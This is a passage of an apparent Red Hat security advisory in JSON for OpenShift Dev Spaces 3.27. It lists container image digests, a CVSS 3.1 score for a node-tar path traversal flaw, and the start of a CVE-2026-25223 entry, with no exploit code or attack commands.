"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check"
},
{
"cve": "CVE-2026-25223",
"cwe": {
"id": "CWE-179",
"name": "Incorrect Behavior Order: Early Validation"
},
"discovery_date": "2026-02-03T22:01:19.884891+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
